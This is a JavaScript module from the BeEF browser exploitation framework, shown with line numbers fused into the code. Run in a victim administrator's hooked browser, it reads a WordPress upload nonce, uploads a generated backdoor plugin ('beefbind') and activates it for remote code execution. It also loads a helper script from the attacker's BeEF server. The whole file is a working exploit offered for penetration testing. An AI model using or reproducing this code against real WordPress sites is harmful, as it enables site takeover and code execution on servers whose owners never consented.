Path: blob/master/modules/misc/wordpress/upload_rce_plugin/command.js
1154 views
/*1Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com2See the file 'doc/COPYING' for copying permission34This is a rewrite of the original module misc/wordpress_post_auth_rce.56Original Author: Bart Leppens7Rewritten by Erwan LR (@erwan_lr | WPScanTeam)8*/910beef.execute(function() {11beef_command_url = '<%= @command_url %>';12beef_command_id = <%= @command_id %>;1314// Adds wp.js to the DOM so we can use some functions here15if (typeof get_nonce !== 'function') {16var wp_script = document.createElement('script');1718wp_script.setAttribute('type', 'text/javascript');19wp_script.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/wp.js');20var theparent = document.getElementsByTagName('head')[0];21theparent.insertBefore(wp_script, theparent.firstChild);22}2324var wp_path = '<%= @wp_path %>';25var upload_nonce_path = '<%= @wp_path %>wp-admin/plugin-install.php?tab=upload';26var upload_plugin_path = '<%= @wp_path %>wp-admin/update.php?action=upload-plugin';2728function upload_and_active_plugin(nonce) {29var boundary = "BEEFBEEF";3031var post_data = "--" + boundary + "\r\n";32post_data += "Content-Disposition: form-data; name=\"_wpnonce\"\r\n";33post_data += "\r\n";34post_data += nonce + "\r\n";35post_data += "--" + boundary + "\r\n";36post_data += "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n";37post_data += "\r\n" + upload_nonce_path + "\r\n";38post_data += "--" + boundary + "\r\n";39post_data += "Content-Disposition: form-data; name=\"pluginzip\";\r\n";40post_data += "filename=\"beefbind.zip\"\r\n";41post_data += "Content-Type: application/octet-stream\r\n";42post_data += "\r\n";43post_data += "<%= Wordpress_upload_rce_plugin.generate_zip_payload(@auth_key) %>";44post_data += "\r\n";45post_data += "--" + boundary + "--\r\n"4647post_as_binary(48upload_plugin_path,49boundary,50post_data,51function(xhr) {52result = xhr.responseXML.getElementsByClassName('wrap')[0];5354if (result == null) {55log('Could not find result of plugin upload in response', 'error');56}57else {58result_text = result.innerText;5960if (/Plugin installed successfully/i.test(result_text)) {61//log('Plugin installed successfully, activating it');6263// Get URL to active the plugin from response, and call it64// <div class="wrap">...<a class="button button-primary" href="plugins.php?action=activate&plugin=beefbind%2Fbeefbind.php&_wpnonce=d13218642e" target="_parent">Activate Plugin</a>6566activation_tag = result.getElementsByClassName('button-primary')[0];6768if (activation_tag == null) {69log('Plugin installed but unable to get activation URL from output', 'error');70}71else {72activation_path = '<%= @wp_path %>wp-admin/' + activation_tag.getAttribute('href');7374get(activation_path, function(xhr) {75result_text = xhr.responseXML.getElementById('message').innerText;7677if (/plugin activated/i.test(result_text)) {78log('Plugin installed and activated! - Auth Key: <%= @auth_key %>', 'success');79}80else {81log('Error while activating the plugin: ' + result_text, 'error');82}83});84}85}86else {87log('Error while installing the plugin: ' + result_text, 'error');88}89}90}91);92}9394// Timeout needed for the wp.js to be loaded first95setTimeout(96function() {97get_nonce(98upload_nonce_path,99'_wpnonce',100function(nonce) { upload_and_active_plugin(nonce) }101)102},103300104);105});106107108109